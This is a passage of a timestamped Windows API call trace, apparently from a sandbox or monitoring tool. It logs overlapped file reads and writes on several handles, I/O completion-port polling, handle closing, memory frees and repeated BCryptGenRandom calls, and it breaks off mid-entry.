[0117.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.893] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0117.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.907] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.916] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.955] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.970] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3158, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.980] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.982] CloseHandle (hObject=0x3bc) returned 1 [0117.984] free (_Block=0x3d70450) [0117.984] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.995] CloseHandle (hObject=0x81c) returned 1 [0117.997] free (_Block=0x3db04c0) [0117.997] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.000] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.000] CloseHandle (hObject=0x2f4) returned 1 [0118.002] free (_Block=0x3e70008) [0118.002] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0118.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.016] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0118.016] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.016] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.016] free (_Block=0x77d7a8) [0118.016] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.019] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.020] free (_Block=0x2071c20) [0118.020] free (_Block=0x2071d30) [0118.020] free (_Block=0x77d8b0) [0118.020] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.020] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.021] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.049] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2454, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.061] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.099] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.099] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.109] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1bba, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0118.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.157] CloseHandle (hObject=0x3bc) returned 1 [0118.163] free (_Block=0x3d70450) [0118.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.174] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xac4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.174] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.176] CloseHandle (hObject=0x2f4) returned 1 [0118.180] free (_Block=0x1ff1e60) [0118.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.249] CloseHandle (hObject=0x340) returned 1 [0118.255] free (_Block=0x3e70008) [0118.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.257] CloseHandle (hObject=0x81c) returned 1 [0118.264] free (_Block=0x3ef0008) [0118.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.267] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1388, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0118.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.268] CloseHandle (hObject=0x3bc) returned 1 [0118.269] free (_Block=0x3d70450) [0118.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.291] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0118.291] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.291] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0118.292] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.292] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.292] free (_Block=0x77d7a8) [0118.292] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.292] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.292] free (_Block=0x2071c20) [0118.292] free (_Block=0x2071d30) [0118.292] free (_Block=0x77d8b0) [0118.292] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.302] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.303] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0118.303] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0118.304] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.304] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.304] free (_Block=0x77d7a8) [0118.304] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.304] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.304] free (_Block=0x2071c20) [0118.305] free (_Block=0x2071d30) [0118.305] free (_Block=0x77d8b0) [0118.305] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0118.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0118.317] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.317] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.317] free (_Block=0x77d7a8) [0118.317] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.317] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.317] free (_Block=0x2071c20) [0118.317] free (_Block=0x2071d30) [0118.318] free (_Block=0x77d8b0) [0118.318] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.333] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0118.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0118.346] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.346] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.346] free (_Block=0x77d7a8) [0118.346] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.346] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.347] free (_Block=0x2071c20) [0118.347] free (_Block=0x2071d30) [0118.347] free (_Block=0x77d8b0) [0118.347] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.352] CloseHandle (hObject=0x340) returned 1 [0118.354] free (_Block=0x3e70008) [0118.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.364] CloseHandle (hObject=0x2f4) returned 1 [0118.368] free (_Block=0x3ef0008) [0118.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.381] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1526, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.405] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.414] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x6860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0118.421] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xa90, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0118.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0120.611] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0120.621] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4280, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0120.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0120.625] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8a12, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.631] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0120.820] CloseHandle (hObject=0x13c0) returned 1 [0120.820] free (_Block=0x3e70008) [0120.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0120.858] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa450, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.858] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0120.860] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0120.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0120.861] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x60c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0121.079] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x11dfe, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, 